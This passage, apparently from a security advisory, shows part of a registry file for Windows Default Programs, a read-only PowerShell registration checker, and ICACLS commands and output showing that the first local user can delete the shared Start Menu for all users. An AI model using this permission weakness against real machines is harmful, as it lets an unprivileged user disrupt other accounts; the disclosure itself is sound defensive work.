"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\Capabilities\FileAssociations]
".bat"="batfile"
".cmd"="cmdfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\HTMLHelp\Capabilities]
"ApplicationDescription"="HTML Help"
"ApplicationName"="HTML Help"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\HTMLHelp\Capabilities\FileAssociations]
".chm"="chm.file"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IExpress Wizard\Capabilities]
"ApplicationDescription"="IExpress Wizard"
"ApplicationName"="IExpress Wizard"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IExpress Wizard\Capabilities\FileAssociations]
".sed"="sedfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\INF Default Install Application\Capabilities]
"ApplicationDescription"="INF Default Install Application"
"ApplicationName"="INF Default Install Application"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\INF Default Install Application\Capabilities\FileAssociations]
".inf"="inffile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft Management Console\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\MMC.exe,-128"
"ApplicationName"="@C:\\Windows\\System32\\MMC.exe,-128"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft Management Console\Capabilities\FileAssociations]
".msc"="mscfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft HTML Application Host\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\MSHTA.exe,-6412"
"ApplicationName"="@C:\\Windows\\System32\\MSHTA.exe,-6412"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft HTML Application Host\Capabilities\FileAssociations]
".hta"="htafile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NotePad\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\NotePad.exe,-9"
"ApplicationName"="@C:\\Windows\\System32\\NotePad.exe,-9"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NotePad\Capabilities\FileAssociations]
".log"="txtfile"
".scp"="txtfile"
".txt"="txtfile"
".wtx"="txtfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe,-111"
"ApplicationName"="@C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe,-109"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\Capabilities\FileAssociations]
".ps1"="Microsoft.PowerShellScript.1"
".ps1xml"="Microsoft.PowerShellXMLData.1"
".psc1"="Microsoft.PowerShellConsole.1"
".psd1"="Microsoft.PowerShellData.1"
".psm1"="Microsoft.PowerShellModule.1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Terminal Server Client\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\MSTSC.exe,-1004"
"ApplicationName"="@C:\\Windows\\System32\\MSTSC.exe,-1004"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Terminal Server Client\Capabilities\FileAssociations]
".rdp"="RDP.File"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\RegEdit\Capabilities]
"ApplicationDescription"="@C:\\Windows\\RegEdit.exe,-16"
"ApplicationName"="@C:\\Windows\\RegEdit.exe,-16"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\RegEdit\Capabilities\FileAssociations]
".reg"="regfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Compressed Folder\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\ZipFldr.dll,-10133"
"ApplicationName"="@C:\\Windows\\System32\\ZipFldr.dll,-10133"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Compressed Folder\Capabilities\FileAssociations]
".zip"="CompressedFolder"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Capabilities]
"ApplicationDescription"="C:\\Windows\\System32\\Control.exe,-1"
"ApplicationName"="C:\\Windows\\System32\\Control.exe,-1"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Capabilities\FileAssociations]
".cpl"="cplfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\MSIMsg.dll,-27"
"ApplicationName"="@C:\\Windows\\System32\\MSIMsg.dll,-28"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Capabilities\FileAssociations]
".msi"="MSI.Package"
".msp"="MSI.Patch"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Capabilities]
"ApplicationDescription"="@C:\\Windows\\System32\\WScript.exe,-1"
"ApplicationName"="@C:\\Windows\\System32\\WScript.exe,-1"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Capabilities\FileAssociations]
".js"="jsfile"
".jse"="jsefile"
".vbe"="vbefile"
".vbs"="vbsfile"
".wsf"="wsffile"
".wsh"="wshfile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Update Standalone Installer\Capabilities]
"ApplicationDescription"="Windows Update Standalone Installer"
"ApplicationName"="Windows Update Standalone Installer"
"Hidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Update Standalone Installer\Capabilities\FileAssociations]
".msu"="Microsoft.System.Update.1"
[HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications]
"Command Processor"="SOFTWARE\\Microsoft\\Command Processor\\Capabilities"
"Compressed Folder"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Compressed Folder\\Capabilities"
"Control Panel"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Capabilities"
"HTMLHelp"="SOFTWARE\\Microsoft\\HTMLHelp\\Capabilities"
"IExpress Wizard"="SOFTWARE\\Microsoft\\IExpress Wizard\\Capabilities"
"INF Default Install Application"="SOFTWARE\\Microsoft\\INF Default Install Application\\Capabilities"
"Microsoft HTML Application Host"="SOFTWARE\\Microsoft\\Microsoft HTML Application Host\\Capabilities"
"Microsoft Management Console"="SOFTWARE\\Microsoft\\Microsoft Management Console\\Capabilities"
"Microsoft PowerShell 1"="SOFTWARE\\Microsoft\\PowerShell\\1\\Capabilities"
"NotePad"="SOFTWARE\\Microsoft\\NotePad\\Capabilities"
"Registry Editor"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Applets\\RegEdit\\Capabilities"
"Terminal Server Client"="SOFTWARE\\Microsoft\\Terminal Server Client\\Capabilities"
"Windows Installer"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\Capabilities"
"Windows Script Host"="SOFTWARE\\Microsoft\\Windows Script Host\\Capabilities"
; the value must name the Capabilities key created above, not a key that does not exist
"Windows Update Standalone Installer"="SOFTWARE\\Microsoft\\Windows Update Standalone Installer\\Capabilities"
Double-click the file whisper.reg created in step 1. to merge its entries into the Registry.
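Added example (not the author's code): a PowerShell check that walks the Default Programs registration chain the file above creates, HKLM\SOFTWARE\RegisteredApplications → Capabilities key → FileAssociations → ProgID, and reports every dangling link: a RegisteredApplications value whose Capabilities key does not exist, a Capabilities key without ApplicationName or ApplicationDescription, and an extension whose key or whose ProgID is missing under HKEY_CLASSES_ROOT. Only the machine-wide HKLM registrations are examined; per-user registrations under HKCU\Software\RegisteredApplications follow the same pattern relative to HKCU.

```powershell
# Added example: read-only validation of Default Programs registrations.
# Uses the .NET Registry API so that value names containing spaces or '/'
# need no escaping.
function Get-RegisteredApplicationFindings {
    $hklm    = [Microsoft.Win32.Registry]::LocalMachine
    $hkcr    = [Microsoft.Win32.Registry]::ClassesRoot
    $regApps = $hklm.OpenSubKey('SOFTWARE\RegisteredApplications')
    if (-not $regApps) { return }

    foreach ($app in $regApps.GetValueNames()) {
        # Each value holds a path relative to HKLM, e.g. SOFTWARE\Microsoft\NotePad\Capabilities.
        $capPath = [string]$regApps.GetValue($app)
        $cap     = $hklm.OpenSubKey($capPath)
        if (-not $cap) {
            # Dangling pointer: Default Programs cannot show this application at all.
            [pscustomobject]@{ Application = $app; Item = $capPath; Finding = 'CapabilitiesKeyMissing' }
            continue
        }
        foreach ($required in 'ApplicationName', 'ApplicationDescription') {
            if (-not $cap.GetValue($required)) {
                [pscustomobject]@{ Application = $app; Item = "$capPath\$required"; Finding = 'RequiredValueMissing' }
            }
        }
        $fa = $cap.OpenSubKey('FileAssociations')
        if (-not $fa) { continue }   # legitimate for applications that register only URL or MIME associations

        foreach ($ext in $fa.GetValueNames()) {
            $progId = [string]$fa.GetValue($ext)
            if (-not $hkcr.OpenSubKey($ext)) {
                # The extension itself is unknown to the shell, so the association can never be selected.
                [pscustomobject]@{ Application = $app; Item = $ext; Finding = 'ExtensionKeyMissing' }
            }
            if (-not $progId -or -not $hkcr.OpenSubKey($progId)) {
                [pscustomobject]@{ Application = $app; Item = "$ext -> $progId"; Finding = 'ProgIdMissing' }
            }
        }
    }
}

Get-RegisteredApplicationFindings | Sort-Object Application, Finding | Format-Table -AutoSize -Wrap
```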
%SystemDrive%\ProgramData\ alias %ProgramData%\ and moved the directory with the shared Start Menu from its previous, properly protected location %ALLUSERSPROFILE%\Start Menu\ to %ProgramData%\Microsoft\Windows\Start Menu\.
Before this relocation only members of the BUILTIN\Administrators group had write and delete access to files and subdirectories beneath %ALLUSERSPROFILE%\ and therefore to the shared Start Menu too – afterwards the DACL of the directory %ProgramData%\Microsoft\Windows\Start Menu\ contains at least one inherit-only ACE like
(A;OICIIO;DTSD;;;S-1-5-21-‹digits›-‹digits›-‹digits›-1000)
which grants the first local user account created during setup DELETE and FILE_DELETE_CHILD access to all files and subdirectories underneath: for almost 19 (in words: nineteen) years at least one unprivileged user has been able to delete the shared Start Menu completely, thus affecting all (other) users of a machine!
Log on to the first user account created during Windows setup and start the Command Processor Cmd.exe unelevated, then execute the following command lines:
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /Q
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\*" /C /Q
IF NOT DEFINED WHISPER (
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini" /C /Q /T | FIND.EXE "%USERDOMAIN%\%USERNAME%"
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk" /C /Q /T | FIND.EXE "%USERDOMAIN%\%USERNAME%"
) ELSE (
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini" /C /Q /T | FINDSTR.EXE /B /C:"%ProgramData%"
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk" /C /Q /T | FINDSTR.EXE /B /C:"%ProgramData%"
)
Note: the command lines can be copied and pasted as block into a Command Processor window.
Note: both branches of the IF (…) ELSE (…) statement yield the same output!
C:\ProgramData\Microsoft\Windows\Start Menu AMNESIAC\Stefan:(OI)(CI)(IO)(DE,DC) AMNESIAC\Administrator:(OI)(CI)(IO)(DE,DC) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) Everyone:(I)(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk AMNESIAC\Stefan:(I)(DE,DC) AMNESIAC\Administrator:(I)(DE,DC) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Everyone:(I)(RX)
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini AMNESIAC\Stefan:(I)(DE,DC) AMNESIAC\Administrator:(I)(DE,DC) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Everyone:(I)(RX)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs AMNESIAC\Stefan:(I)(OI)(CI)(DE,DC) AMNESIAC\Administrator:(I)(OI)(CI)(DE,DC) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) Everyone:(I)(OI)(CI)(RX)
C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk AMNESIAC\Stefan:(I)(DE,DC) AMNESIAC\Administrator:(I)(DE,DC) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Everyone:(I)(RX)
Successfully processed 4 files; Failed processing 0 files
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Virtual PC\desktop.ini AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Calendar.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Mail.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\DisplaySwitch.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\NetworkProjection.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sync Center.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Speech Recognition.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\dfrgui.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Registry Editor.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Information.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Task Scheduler.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer Reports.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\ShapeCollector.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\TabTip.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE (x86).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Management.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\IIS Manager.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Microsoft .NET Framework 2.0 Configuration.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Scan Management.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Application Verifier\Application Verifier.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Application Verifier (x64)\Application Verifier (x64).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x64)\Debugging Help.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x64)\Global Flags.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x64)\Release Notes.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x64)\Uninstall Debugging Tools for Windows (x64).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x64)\WinDbg.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Debugging Help.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Global Flags.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Release Notes.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Uninstall Debugging Tools for Windows (x86).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\WinDbg.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Create Recovery Disc.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Remote Assistance.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Release Notes.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Samples Directory.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Samples Reference.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools Reference.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Windows SDK 7.1 Command Prompt.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\Accessible Event Watcher (x64).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\GUID Generator.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\Inspect Objects (x64).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\Manifest_Generator (x64).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\OLE-COM Object Viewer (x64).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\WinDiff (x64).lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Tools\Windows Troubleshooting Pack Designer.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v7.1\Visual Studio Registration\Windows SDK Configuration Tool.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Virtual PC\Virtual Machines.lnk AMNESIAC\Stefan:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Virtual PC\Virtual Windows XP.lnk AMNESIAC\Stefan:(I)(DE,DC)
OUCH¹: on this installation of Windows 7 all subdirectories, shortcuts and desktop.ini files of the shared Start Menu are not properly protected – the unprivileged primary user AMNESIAC\Stefan holds DE (delete) and DC (delete child) access on every one of them and is able to remove them all!
On Windows 10 and later versions of Windows NT run the following alternative command line instead:
ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /T | FINDSTR.EXE /L "%ProgramData% (DE,DC)"
C:\ProgramData\Microsoft\Windows\Start Menu S-1-5-21-1717989741-1660040995-2455016376-1002:(OI)(CI)(IO)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(OI)(CI)(IO)(DE,DC) WHISPER\Administrator:(OI)(CI)(IO)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) WHISPER\Administrator:(I)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(OI)(CI)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(OI)(CI)(DE,DC) WHISPER\Administrator:(I)(OI)(CI)(DE,DC)
